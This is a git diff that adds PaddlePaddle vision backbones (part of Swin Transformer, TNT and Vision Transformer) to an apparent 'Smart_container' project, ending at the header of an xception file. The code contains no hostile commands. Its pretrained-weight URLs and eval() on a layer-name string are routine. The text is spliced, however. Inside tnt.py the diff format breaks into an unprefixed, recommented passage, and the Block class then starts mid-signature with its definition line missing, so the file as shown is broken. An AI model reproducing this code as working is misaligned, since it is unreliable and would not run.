self.patch_embed = PatchEmbed( + img_size=img_size, + patch_size=patch_size, + in_chans=in_chans, + embed_dim=embed_dim, + norm_layer=norm_layer if self.patch_norm else None) + num_patches = self.patch_embed.num_patches + patches_resolution = self.patch_embed.patches_resolution + self.patches_resolution = patches_resolution + + # 
absolute position embedding + if self.ape: + self.absolute_pos_embed = self.create_parameter( + shape=(1, num_patches, embed_dim), default_initializer=zeros_) + self.add_parameter("absolute_pos_embed", self.absolute_pos_embed) + trunc_normal_(self.absolute_pos_embed) + + self.pos_drop = nn.Dropout(p=drop_rate) + + # stochastic depth + dpr = np.linspace(0, drop_path_rate, + sum(depths)).tolist() # stochastic depth decay rule + + # build layers + self.layers = nn.LayerList() + for i_layer in range(self.num_layers): + layer = BasicLayer( + dim=int(embed_dim * 2**i_layer), + input_resolution=(patches_resolution[0] // (2**i_layer), + patches_resolution[1] // (2**i_layer)), + depth=depths[i_layer], + num_heads=num_heads[i_layer], + window_size=window_size, + mlp_ratio=self.mlp_ratio, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + drop=drop_rate, + attn_drop=attn_drop_rate, + drop_path=dpr[sum(depths[:i_layer]):sum(depths[:i_layer + 1])], + norm_layer=norm_layer, + downsample=PatchMerging + if (i_layer < self.num_layers - 1) else None, + use_checkpoint=use_checkpoint) + self.layers.append(layer) + + self.norm = norm_layer(self.num_features) + self.avgpool = nn.AdaptiveAvgPool1D(1) + self.head = nn.Linear( + self.num_features, + num_classes) if self.num_classes > 0 else nn.Identity() + + self.apply(self._init_weights) + + def _init_weights(self, m): + if isinstance(m, nn.Linear): + trunc_normal_(m.weight) + if isinstance(m, nn.Linear) and m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.LayerNorm): + zeros_(m.bias) + ones_(m.weight) + + def forward_features(self, x): + x = self.patch_embed(x) + if self.ape: + x = x + self.absolute_pos_embed + x = self.pos_drop(x) + + for layer in self.layers: + x = layer(x) + + x = self.norm(x) # B L C + x = self.avgpool(x.transpose([0, 2, 1])) # B C 1 + x = paddle.flatten(x, 1) + return x + + def forward(self, x): + x = self.forward_features(x) + x = self.head(x) + return x + + def flops(self): + flops = 0 + flops += 
self.patch_embed.flops() + for _, layer in enumerate(self.layers): + flops += layer.flops() + flops += self.num_features * self.patches_resolution[ + 0] * self.patches_resolution[1] // (2**self.num_layers) + flops += self.num_features * self.num_classes + return flops + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def SwinTransformer_tiny_patch4_window7_224(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + embed_dim=96, + depths=[2, 2, 6, 2], + num_heads=[3, 6, 12, 24], + window_size=7, + drop_path_rate=0.2, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_tiny_patch4_window7_224"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_small_patch4_window7_224(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + embed_dim=96, + depths=[2, 2, 18, 2], + num_heads=[3, 6, 12, 24], + window_size=7, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_small_patch4_window7_224"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_base_patch4_window7_224(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + embed_dim=128, + depths=[2, 2, 18, 2], + num_heads=[4, 8, 16, 32], + window_size=7, + drop_path_rate=0.5, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_base_patch4_window7_224"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_base_patch4_window12_384(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + img_size=384, + embed_dim=128, + depths=[2, 2, 18, 2], + num_heads=[4, 8, 16, 32], + 
window_size=12, + drop_path_rate=0.5, # NOTE: do not appear in offical code + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_base_patch4_window12_384"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_large_patch4_window7_224(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + embed_dim=192, + depths=[2, 2, 18, 2], + num_heads=[6, 12, 24, 48], + window_size=7, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_large_patch4_window7_224"], + use_ssld=use_ssld) + return model + + +def SwinTransformer_large_patch4_window12_384(pretrained=False, + use_ssld=False, + **kwargs): + model = SwinTransformer( + img_size=384, + embed_dim=192, + depths=[2, 2, 18, 2], + num_heads=[6, 12, 24, 48], + window_size=12, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SwinTransformer_large_patch4_window12_384"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/tnt.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/tnt.py new file mode 100644 index 0000000..13e9b5c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/tnt.py @@ -0,0 +1,383 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
import math
import numpy as np

import paddle
import paddle.nn as nn

from paddle.nn.initializer import TruncatedNormal, Constant

from ppcls.arch.backbone.base.theseus_layer import Identity
from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url

MODEL_URLS = {
    "TNT_small":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/TNT_small_pretrained.pdparams"
}

# Export a concrete list (consistent with the other model_zoo modules)
# rather than a live dict view tied to MODEL_URLS.
__all__ = list(MODEL_URLS.keys())

trunc_normal_ = TruncatedNormal(std=.02)
zeros_ = Constant(value=0.)
ones_ = Constant(value=1.)


def drop_path(x, drop_prob=0., training=False):
    """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).

    The original name is misleading as 'Drop Connect' is a different form of
    dropout in a separate paper.
    See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956

    Args:
        x: input tensor; the first axis is treated as the sample axis.
        drop_prob (float): probability of zeroing a whole sample's path.
        training (bool): no-op unless True (identity at inference time).
    """
    if drop_prob == 0. or not training:
        return x
    keep_prob = paddle.to_tensor(1 - drop_prob)
    # One Bernoulli draw per sample, broadcast over all remaining axes.
    shape = (paddle.shape(x)[0], ) + (1, ) * (x.ndim - 1)
    random_tensor = paddle.add(keep_prob, paddle.rand(shape, dtype=x.dtype))
    random_tensor = paddle.floor(random_tensor)  # binarize
    # Rescale kept paths by 1/keep_prob so the expectation is unchanged.
    output = x.divide(keep_prob) * random_tensor
    return output


class DropPath(nn.Layer):
    """Layer wrapper around `drop_path` (Stochastic Depth per sample)."""

    def __init__(self, drop_prob=None):
        super(DropPath, self).__init__()
        self.drop_prob = drop_prob

    def forward(self, x):
        return drop_path(x, self.drop_prob, self.training)


class Mlp(nn.Layer):
    """Transformer feed-forward block: Linear -> act -> drop -> Linear -> drop."""

    def __init__(self,
                 in_features,
                 hidden_features=None,
                 out_features=None,
                 act_layer=nn.GELU,
                 drop=0.):
        super().__init__()
        # Hidden and output widths default to the input width.
        out_features = out_features or in_features
        hidden_features = hidden_features or in_features
        self.fc1 = nn.Linear(in_features, hidden_features)
        self.act = act_layer()
        self.fc2 = nn.Linear(hidden_features, out_features)
        self.drop = nn.Dropout(drop)

    def forward(self, x):
        x = self.fc1(x)
        x = self.act(x)
        x = self.drop(x)
        x = self.fc2(x)
        x = self.drop(x)
        return x


class Attention(nn.Layer):
    """Multi-head self-attention used by TNT.

    Q and K are projected to `hidden_dim` (split across `num_heads`), while
    V and the output projection keep the input width `dim`.
    """

    def __init__(self,
                 dim,
                 hidden_dim,
                 num_heads=8,
                 qkv_bias=False,
                 attn_drop=0.,
                 proj_drop=0.):
        super().__init__()
        self.hidden_dim = hidden_dim
        self.num_heads = num_heads
        head_dim = hidden_dim // num_heads
        self.head_dim = head_dim
        self.scale = head_dim**-0.5

        # Fused Q/K projection; V is projected separately at width `dim`.
        self.qk = nn.Linear(dim, hidden_dim * 2, bias_attr=qkv_bias)
        self.v = nn.Linear(dim, dim, bias_attr=qkv_bias)
        self.attn_drop = nn.Dropout(attn_drop)
        self.proj = nn.Linear(dim, dim)
        self.proj_drop = nn.Dropout(proj_drop)

    def forward(self, x):
        B, N, C = x.shape
        # (B, N, 2, heads, head_dim) -> (2, B, heads, N, head_dim)
        qk = self.qk(x).reshape(
            (B, N, 2, self.num_heads, self.head_dim)).transpose(
                (2, 0, 3, 1, 4))

        q, k = qk[0], qk[1]
        v = self.v(x).reshape(
            (B, N, self.num_heads, x.shape[-1] // self.num_heads)).transpose(
                (0, 2, 1, 3))

        attn = paddle.matmul(q, k.transpose((0, 1, 3, 2))) * self.scale
        attn = nn.functional.softmax(attn, axis=-1)
        attn = self.attn_drop(attn)

        x = paddle.matmul(attn, v)
        # Merge heads back: (B, heads, N, head_dim) -> (B, N, dim).
        x = x.transpose((0, 2, 1, 3)).reshape(
            (B, N, x.shape[-1] * x.shape[-3]))
        x = self.proj(x)
        x = self.proj_drop(x)
        return x
+ qkv_bias=False, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm): + super().__init__() + # Inner transformer + self.norm_in = norm_layer(in_dim) + self.attn_in = Attention( + in_dim, + in_dim, + num_heads=in_num_head, + qkv_bias=qkv_bias, + attn_drop=attn_drop, + proj_drop=drop) + + self.norm_mlp_in = norm_layer(in_dim) + self.mlp_in = Mlp(in_features=in_dim, + hidden_features=int(in_dim * 4), + out_features=in_dim, + act_layer=act_layer, + drop=drop) + + self.norm1_proj = norm_layer(in_dim) + self.proj = nn.Linear(in_dim * num_pixel, dim) + # Outer transformer + self.norm_out = norm_layer(dim) + self.attn_out = Attention( + dim, + dim, + num_heads=num_heads, + qkv_bias=qkv_bias, + attn_drop=attn_drop, + proj_drop=drop) + + self.drop_path = DropPath(drop_path) if drop_path > 0. else Identity() + + self.norm_mlp = norm_layer(dim) + self.mlp = Mlp(in_features=dim, + hidden_features=int(dim * mlp_ratio), + out_features=dim, + act_layer=act_layer, + drop=drop) + + def forward(self, pixel_embed, patch_embed): + # inner + pixel_embed = paddle.add( + pixel_embed, + self.drop_path(self.attn_in(self.norm_in(pixel_embed)))) + pixel_embed = paddle.add( + pixel_embed, + self.drop_path(self.mlp_in(self.norm_mlp_in(pixel_embed)))) + # outer + B, N, C = patch_embed.shape + norm1_proj = self.norm1_proj(pixel_embed) + norm1_proj = norm1_proj.reshape( + (B, N - 1, norm1_proj.shape[1] * norm1_proj.shape[2])) + patch_embed[:, 1:] = paddle.add(patch_embed[:, 1:], + self.proj(norm1_proj)) + patch_embed = paddle.add( + patch_embed, + self.drop_path(self.attn_out(self.norm_out(patch_embed)))) + patch_embed = paddle.add( + patch_embed, self.drop_path(self.mlp(self.norm_mlp(patch_embed)))) + return pixel_embed, patch_embed + + +class PixelEmbed(nn.Layer): + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + in_dim=48, + stride=4): + super().__init__() + num_patches = (img_size // patch_size)**2 + self.img_size = img_size + 
self.num_patches = num_patches + self.in_dim = in_dim + new_patch_size = math.ceil(patch_size / stride) + self.new_patch_size = new_patch_size + + self.proj = nn.Conv2D( + in_chans, self.in_dim, kernel_size=7, padding=3, stride=stride) + + def forward(self, x, pixel_pos): + B, C, H, W = x.shape + assert H == self.img_size and W == self.img_size, f"Input image size ({H}*{W}) doesn't match model ({self.img_size}*{self.img_size})." + + x = self.proj(x) + x = nn.functional.unfold(x, self.new_patch_size, self.new_patch_size) + x = x.transpose((0, 2, 1)).reshape( + (-1, self.in_dim, self.new_patch_size, self.new_patch_size)) + x = x + pixel_pos + x = x.reshape((-1, self.in_dim, self.new_patch_size * + self.new_patch_size)).transpose((0, 2, 1)) + return x + + +class TNT(nn.Layer): + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + embed_dim=768, + in_dim=48, + depth=12, + num_heads=12, + in_num_head=4, + mlp_ratio=4., + qkv_bias=False, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0., + norm_layer=nn.LayerNorm, + first_stride=4, + class_num=1000): + super().__init__() + self.class_num = class_num + # num_features for consistency with other models + self.num_features = self.embed_dim = embed_dim + + self.pixel_embed = PixelEmbed( + img_size=img_size, + patch_size=patch_size, + in_chans=in_chans, + in_dim=in_dim, + stride=first_stride) + num_patches = self.pixel_embed.num_patches + self.num_patches = num_patches + new_patch_size = self.pixel_embed.new_patch_size + num_pixel = new_patch_size**2 + + self.norm1_proj = norm_layer(num_pixel * in_dim) + self.proj = nn.Linear(num_pixel * in_dim, embed_dim) + self.norm2_proj = norm_layer(embed_dim) + + self.cls_token = self.create_parameter( + shape=(1, 1, embed_dim), default_initializer=zeros_) + self.add_parameter("cls_token", self.cls_token) + + self.patch_pos = self.create_parameter( + shape=(1, num_patches + 1, embed_dim), default_initializer=zeros_) + self.add_parameter("patch_pos", self.patch_pos) 
+ + self.pixel_pos = self.create_parameter( + shape=(1, in_dim, new_patch_size, new_patch_size), + default_initializer=zeros_) + self.add_parameter("pixel_pos", self.pixel_pos) + + self.pos_drop = nn.Dropout(p=drop_rate) + + # stochastic depth decay rule + dpr = np.linspace(0, drop_path_rate, depth) + + blocks = [] + for i in range(depth): + blocks.append( + Block( + dim=embed_dim, + in_dim=in_dim, + num_pixel=num_pixel, + num_heads=num_heads, + in_num_head=in_num_head, + mlp_ratio=mlp_ratio, + qkv_bias=qkv_bias, + drop=drop_rate, + attn_drop=attn_drop_rate, + drop_path=dpr[i], + norm_layer=norm_layer)) + self.blocks = nn.LayerList(blocks) + self.norm = norm_layer(embed_dim) + + if class_num > 0: + self.head = nn.Linear(embed_dim, class_num) + + trunc_normal_(self.cls_token) + trunc_normal_(self.patch_pos) + trunc_normal_(self.pixel_pos) + self.apply(self._init_weights) + + def _init_weights(self, m): + if isinstance(m, nn.Linear): + trunc_normal_(m.weight) + if isinstance(m, nn.Linear) and m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.LayerNorm): + zeros_(m.bias) + ones_(m.weight) + + def forward_features(self, x): + B = paddle.shape(x)[0] + pixel_embed = self.pixel_embed(x, self.pixel_pos) + + patch_embed = self.norm2_proj( + self.proj( + self.norm1_proj( + pixel_embed.reshape((-1, self.num_patches, pixel_embed. 
+                                         shape[-1] * pixel_embed.shape[-2])))))
+        patch_embed = paddle.concat(
+            (self.cls_token.expand((B, -1, -1)), patch_embed), axis=1)
+        patch_embed = patch_embed + self.patch_pos
+        patch_embed = self.pos_drop(patch_embed)
+
+        for blk in self.blocks:
+            pixel_embed, patch_embed = blk(pixel_embed, patch_embed)
+
+        patch_embed = self.norm(patch_embed)
+        return patch_embed[:, 0]
+
+    def forward(self, x):
+        x = self.forward_features(x)
+
+        if self.class_num > 0:
+            x = self.head(x)
+        return x
+
+
+def _load_pretrained(pretrained, model, model_url, use_ssld=False):
+    if pretrained is False:
+        pass
+    elif pretrained is True:
+        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
+    elif isinstance(pretrained, str):
+        load_dygraph_pretrain(model, pretrained)
+    else:
+        raise RuntimeError(
+            "pretrained type is not available. Please use `string` or `boolean` type."
+        )
+
+
+def TNT_small(pretrained=False, use_ssld=False, **kwargs):
+    # Build a TNT-S backbone. `use_ssld` (default False, so existing callers
+    # are unaffected) is forwarded to `_load_pretrained` for consistency with
+    # every other backbone factory in this repo (ViT_*, Xception*, ...),
+    # which already accept and forward it.
+    model = TNT(patch_size=16,
+                embed_dim=384,
+                in_dim=24,
+                depth=12,
+                num_heads=6,
+                in_num_head=4,
+                qkv_bias=False,
+                **kwargs)
+    _load_pretrained(
+        pretrained, model, MODEL_URLS["TNT_small"], use_ssld=use_ssld)
+    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/vision_transformer.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/vision_transformer.py
new file mode 100644
index 0000000..8cfa559
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/vision_transformer.py
@@ -0,0 +1,511 @@
+# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+# NOTE: the `Callable` alias in the `collections` top-level namespace was
+# deprecated since Python 3.3 and removed in Python 3.10; it must be
+# imported from `collections.abc` (used below for isinstance checks on
+# `norm_layer`).
+from collections.abc import Callable
+
+import numpy as np
+import paddle
+import paddle.nn as nn
+from paddle.nn.initializer import TruncatedNormal, Constant, Normal
+
+from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url
+
+MODEL_URLS = {
+    "ViT_small_patch16_224":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_small_patch16_224_pretrained.pdparams",
+    "ViT_base_patch16_224":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_base_patch16_224_pretrained.pdparams",
+    "ViT_base_patch16_384":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_base_patch16_384_pretrained.pdparams",
+    "ViT_base_patch32_384":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_base_patch32_384_pretrained.pdparams",
+    "ViT_large_patch16_224":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_large_patch16_224_pretrained.pdparams",
+    "ViT_large_patch16_384":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_large_patch16_384_pretrained.pdparams",
+    "ViT_large_patch32_384":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_large_patch32_384_pretrained.pdparams",
+    "ViT_huge_patch16_224":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_huge_patch16_224_pretrained.pdparams",
+    "ViT_huge_patch32_384":
+    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ViT_huge_patch32_384_pretrained.pdparams"
+}
+
+__all__ = list(MODEL_URLS.keys())
+
+trunc_normal_ = TruncatedNormal(std=.02)
+normal_ = Normal
+zeros_ = Constant(value=0.)
+ones_ = Constant(value=1.)
+
+
+def to_2tuple(x):
+    return tuple([x] * 2)
+
+
+def drop_path(x, drop_prob=0., training=False):
+    """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
+ the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper... + See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... + """ + if drop_prob == 0. or not training: + return x + keep_prob = paddle.to_tensor(1 - drop_prob) + shape = (paddle.shape(x)[0], ) + (1, ) * (x.ndim - 1) + random_tensor = keep_prob + paddle.rand(shape, dtype=x.dtype) + random_tensor = paddle.floor(random_tensor) # binarize + output = x.divide(keep_prob) * random_tensor + return output + + +class DropPath(nn.Layer): + """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks). + """ + + def __init__(self, drop_prob=None): + super(DropPath, self).__init__() + self.drop_prob = drop_prob + + def forward(self, x): + return drop_path(x, self.drop_prob, self.training) + + +class Identity(nn.Layer): + def __init__(self): + super(Identity, self).__init__() + + def forward(self, input): + return input + + +class Mlp(nn.Layer): + def __init__(self, + in_features, + hidden_features=None, + out_features=None, + act_layer=nn.GELU, + drop=0.): + super().__init__() + out_features = out_features or in_features + hidden_features = hidden_features or in_features + self.fc1 = nn.Linear(in_features, hidden_features) + self.act = act_layer() + self.fc2 = nn.Linear(hidden_features, out_features) + self.drop = nn.Dropout(drop) + + def forward(self, x): + x = self.fc1(x) + x = self.act(x) + x = self.drop(x) + x = self.fc2(x) + x = self.drop(x) + return x + + +class Attention(nn.Layer): + def __init__(self, + dim, + num_heads=8, + qkv_bias=False, + qk_scale=None, + attn_drop=0., + proj_drop=0.): + super().__init__() + self.num_heads = num_heads + head_dim = dim // num_heads + self.scale = qk_scale or head_dim**-0.5 + + self.qkv = nn.Linear(dim, dim * 3, bias_attr=qkv_bias) + self.attn_drop = nn.Dropout(attn_drop) + self.proj = nn.Linear(dim, dim) + self.proj_drop = nn.Dropout(proj_drop) + + def forward(self, x): 
+ # B= paddle.shape(x)[0] + N, C = x.shape[1:] + qkv = self.qkv(x).reshape((-1, N, 3, self.num_heads, C // + self.num_heads)).transpose((2, 0, 3, 1, 4)) + q, k, v = qkv[0], qkv[1], qkv[2] + + attn = (q.matmul(k.transpose((0, 1, 3, 2)))) * self.scale + attn = nn.functional.softmax(attn, axis=-1) + attn = self.attn_drop(attn) + + x = (attn.matmul(v)).transpose((0, 2, 1, 3)).reshape((-1, N, C)) + x = self.proj(x) + x = self.proj_drop(x) + return x + + +class Block(nn.Layer): + def __init__(self, + dim, + num_heads, + mlp_ratio=4., + qkv_bias=False, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer='nn.LayerNorm', + epsilon=1e-5): + super().__init__() + if isinstance(norm_layer, str): + self.norm1 = eval(norm_layer)(dim, epsilon=epsilon) + elif isinstance(norm_layer, Callable): + self.norm1 = norm_layer(dim) + else: + raise TypeError( + "The norm_layer must be str or paddle.nn.layer.Layer class") + self.attn = Attention( + dim, + num_heads=num_heads, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + attn_drop=attn_drop, + proj_drop=drop) + # NOTE: drop path for stochastic depth, we shall see if this is better than dropout here + self.drop_path = DropPath(drop_path) if drop_path > 0. 
else Identity() + if isinstance(norm_layer, str): + self.norm2 = eval(norm_layer)(dim, epsilon=epsilon) + elif isinstance(norm_layer, Callable): + self.norm2 = norm_layer(dim) + else: + raise TypeError( + "The norm_layer must be str or paddle.nn.layer.Layer class") + mlp_hidden_dim = int(dim * mlp_ratio) + self.mlp = Mlp(in_features=dim, + hidden_features=mlp_hidden_dim, + act_layer=act_layer, + drop=drop) + + def forward(self, x): + x = x + self.drop_path(self.attn(self.norm1(x))) + x = x + self.drop_path(self.mlp(self.norm2(x))) + return x + + +class PatchEmbed(nn.Layer): + """ Image to Patch Embedding + """ + + def __init__(self, img_size=224, patch_size=16, in_chans=3, embed_dim=768): + super().__init__() + img_size = to_2tuple(img_size) + patch_size = to_2tuple(patch_size) + num_patches = (img_size[1] // patch_size[1]) * \ + (img_size[0] // patch_size[0]) + self.img_size = img_size + self.patch_size = patch_size + self.num_patches = num_patches + + self.proj = nn.Conv2D( + in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) + + def forward(self, x): + B, C, H, W = x.shape + assert H == self.img_size[0] and W == self.img_size[1], \ + f"Input image size ({H}*{W}) doesn't match model ({self.img_size[0]}*{self.img_size[1]})." 
+ + x = self.proj(x).flatten(2).transpose((0, 2, 1)) + return x + + +class VisionTransformer(nn.Layer): + """ Vision Transformer with support for patch input + """ + + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + class_num=1000, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=False, + qk_scale=None, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0., + norm_layer='nn.LayerNorm', + epsilon=1e-5, + **kwargs): + super().__init__() + self.class_num = class_num + + self.num_features = self.embed_dim = embed_dim + + self.patch_embed = PatchEmbed( + img_size=img_size, + patch_size=patch_size, + in_chans=in_chans, + embed_dim=embed_dim) + num_patches = self.patch_embed.num_patches + + self.pos_embed = self.create_parameter( + shape=(1, num_patches + 1, embed_dim), default_initializer=zeros_) + self.add_parameter("pos_embed", self.pos_embed) + self.cls_token = self.create_parameter( + shape=(1, 1, embed_dim), default_initializer=zeros_) + self.add_parameter("cls_token", self.cls_token) + self.pos_drop = nn.Dropout(p=drop_rate) + + dpr = np.linspace(0, drop_path_rate, depth) + + self.blocks = nn.LayerList([ + Block( + dim=embed_dim, + num_heads=num_heads, + mlp_ratio=mlp_ratio, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + drop=drop_rate, + attn_drop=attn_drop_rate, + drop_path=dpr[i], + norm_layer=norm_layer, + epsilon=epsilon) for i in range(depth) + ]) + + self.norm = eval(norm_layer)(embed_dim, epsilon=epsilon) + + # Classifier head + self.head = nn.Linear(embed_dim, + class_num) if class_num > 0 else Identity() + + trunc_normal_(self.pos_embed) + trunc_normal_(self.cls_token) + self.apply(self._init_weights) + + def _init_weights(self, m): + if isinstance(m, nn.Linear): + trunc_normal_(m.weight) + if isinstance(m, nn.Linear) and m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.LayerNorm): + zeros_(m.bias) + ones_(m.weight) + + def forward_features(self, x): + # B = x.shape[0] + B = paddle.shape(x)[0] + x = 
self.patch_embed(x) + cls_tokens = self.cls_token.expand((B, -1, -1)) + x = paddle.concat((cls_tokens, x), axis=1) + x = x + self.pos_embed + x = self.pos_drop(x) + for blk in self.blocks: + x = blk(x) + x = self.norm(x) + return x[:, 0] + + def forward(self, x): + x = self.forward_features(x) + x = self.head(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ViT_small_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=768, + depth=8, + num_heads=8, + mlp_ratio=3, + qk_scale=768**-0.5, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_small_patch16_224"], + use_ssld=use_ssld) + return model + + +def ViT_base_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_base_patch16_224"], + use_ssld=use_ssld) + return model + + +def ViT_base_patch16_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_base_patch16_384"], + use_ssld=use_ssld) + return model + + +def ViT_base_patch32_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=32, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + 
**kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_base_patch32_384"], + use_ssld=use_ssld) + return model + + +def ViT_large_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=1024, + depth=24, + num_heads=16, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_large_patch16_224"], + use_ssld=use_ssld) + return model + + +def ViT_large_patch16_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=16, + embed_dim=1024, + depth=24, + num_heads=16, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_large_patch16_384"], + use_ssld=use_ssld) + return model + + +def ViT_large_patch32_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=32, + embed_dim=1024, + depth=24, + num_heads=16, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_large_patch32_384"], + use_ssld=use_ssld) + return model + + +def ViT_huge_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=1280, + depth=32, + num_heads=16, + mlp_ratio=4, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_huge_patch16_224"], + use_ssld=use_ssld) + return model + + +def ViT_huge_patch32_384(pretrained=False, + use_ssld=False, + **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=32, + embed_dim=1280, + depth=32, + num_heads=16, + mlp_ratio=4, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ViT_huge_patch32_384"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/xception.py 
